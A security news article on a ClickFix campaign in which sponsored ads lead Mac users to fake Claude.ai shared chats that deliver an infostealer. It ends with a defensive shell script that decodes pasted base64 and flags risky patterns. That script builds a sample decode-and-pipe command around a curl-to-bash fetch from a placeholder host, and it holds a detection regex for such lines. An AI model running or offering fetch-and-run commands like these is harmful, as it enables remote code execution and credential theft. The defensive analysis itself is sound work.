Sponsored ads lead Mac users to fake Claude chats

Paid search ads send Mac users to attacker-created shared chats on Claude.ai that tell them to paste a command into Terminal. The command runs a ClickFix-style loader that installs an infostealer targeting browser passwords, Keychain items and cryptocurrency wallet data.

Security researchers found paid search ads directing Mac users to shared Claude.ai chats that impersonate official guides. The pages instruct visitors to paste a command into Terminal. Following those instructions launches a ClickFix-style attack chain: the pasted command fetches and runs attacker code that harvests stored credentials and wallet data. ClickFix is the name of the lure (a fake "fix" or setup step that gets the victim to run a command themselves), not of the payload it delivers.

Researchers located the pages by searching for terms such as "Claude Mac download" and following the sponsored results. The ads point at the legitimate claude.ai domain, but the destination is a shared chat created by the attacker, so the trusted domain lends credibility to attacker-authored content. The chats carry titles such as "Claude Code on Mac" or "Apple Support" and present step-by-step instructions that end with a base64-encoded command to paste into Terminal.

When the user pastes the encoded command, the shell decodes it and runs a loader script fetched from attacker-controlled infrastructure. The loader is piped straight into an interpreter, so it executes in memory, profiles the machine, downloads a second-stage payload and invokes osascript, the macOS command-line runner for AppleScript and JavaScript for Automation, to execute further code. Because nothing arrives as an application bundle, the quarantine attribute and Gatekeeper checks that apply to downloaded apps never come into play, and the chain achieves remote code execution without installing a conventional application or leaving a standard executable on disk.

The resulting payload behaves like a MacSync-style infostealer. It collects browser passwords and cookies, extracts items from the macOS Keychain and scans for cryptocurrency wallet data. The collected files and credentials are bundled and exfiltrated to attacker servers over HTTP.

Some of the shared chats use pressure tactics to push visitors to act quickly: countdown timers, fake user counters and urgent wording. Sponsored search placements can be bought by anyone, appear ahead of organic results and display a legitimate domain, which is what gets victims onto the malicious chat in the first place and makes them more likely to follow its instructions.

Apple added warnings for ClickFix-style social engineering in macOS Tahoe 26.4 and later. Machines on earlier macOS releases do not show those built-in warnings, so the precautions below apply regardless of version.

Researchers recommend never running a command copied from a website, email or message unless the source is verified and you understand what the command does. Check instructions against official documentation or with the vendor's support channel. Typing a command by hand instead of pasting it forces you to read what you are about to run and defeats clipboard tricks: a page's copy handler can place text on the clipboard that differs from what is displayed, and a trailing newline can execute the command the moment it is pasted. A base64 blob presented as a command cannot be read at all, so decode it first and treat any decode-and-pipe-to-shell construction as hostile. Keep anti-malware with web protection up to date and consider browser tools that block malicious pages or warn when a site writes to the clipboard.
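As an added example (not code from the report, its researchers or any vendor tool), the following POSIX shell script performs the pre-flight check just described and mirrors the decode step of the attack chain: it pulls base64 blobs out of pasted text, decodes them without executing anything, and flags a fetch-and-pipe-to-shell, base64-decode-and-pipe or osascript pattern in either the visible text or the decoded blob. The indicator regex, the function names and the sample paste (built around a placeholder .invalid domain) are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the report or any vendor tool: a pre-flight check
# for a command copied from a web page, run BEFORE it is pasted into Terminal.
# It extracts base64 blobs, decodes them without executing anything, and flags
# the download-and-pipe-to-shell and osascript patterns the article describes.
# The indicator list and the sample paste below are assumptions.

# Print the decoded form of every base64-looking token (20+ base64 characters)
# found in the pasted text given as $1. Nothing is executed; tokens that fail
# to decode are skipped.
decode_b64_tokens() {
    printf '%s\n' "$1" \
      | grep -oE '[A-Za-z0-9+/]{20,}={0,2}' \
      | while IFS= read -r tok; do
            printf '%s' "$tok" | base64 --decode 2>/dev/null || true
            printf '\n'
        done
}

# Indicators of fetch-and-run: "curl|wget ... | sh/bash/zsh", a base64 decode
# piped onward, or any osascript invocation. Assumed, deliberately short list
# for the example; a real tool would carry a broader signature set.
SUSPICIOUS_RE='(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh|base64[[:space:]]+(-d|-D|--decode)[^|]*[|]|osascript'

# Verdict for a pasted command: SUSPICIOUS if the visible text or any decoded
# blob matches an indicator, otherwise CLEAN.
score_paste() {
    decoded=$(decode_b64_tokens "$1" | tr -cd '[:print:]\n')
    if printf '%s\n%s\n' "$1" "$decoded" | grep -qiE "$SUSPICIOUS_RE"; then
        echo SUSPICIOUS
    else
        echo CLEAN
    fi
}

# Constructed sample modelled on the article's description: the attacker's
# loader line, its base64 form, and the one-liner a victim is told to paste.
# The domain is a placeholder (.invalid never resolves).
SAMPLE_INNER='curl -fsSL https://loader.example.invalid/stage1.sh | bash'
SAMPLE_B64=$(printf '%s' "$SAMPLE_INNER" | base64 | tr -d '\n')
SAMPLE_PASTE="echo $SAMPLE_B64 | base64 --decode | bash"

echo "what the paste would actually run:"
decode_b64_tokens "$SAMPLE_PASTE"
echo "verdict: $(score_paste "$SAMPLE_PASTE")"
echo "verdict: $(score_paste 'brew install --cask claude')"
```

The decode step is what a user cannot do by eye: the visible one-liner shows only an opaque blob, while the decoded output shows the curl-to-bash fetch that the blob hides. Extend SUSPICIOUS_RE rather than relying on the three patterns here; they cover the chain as described in the article, not every obfuscation an attacker might choose.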
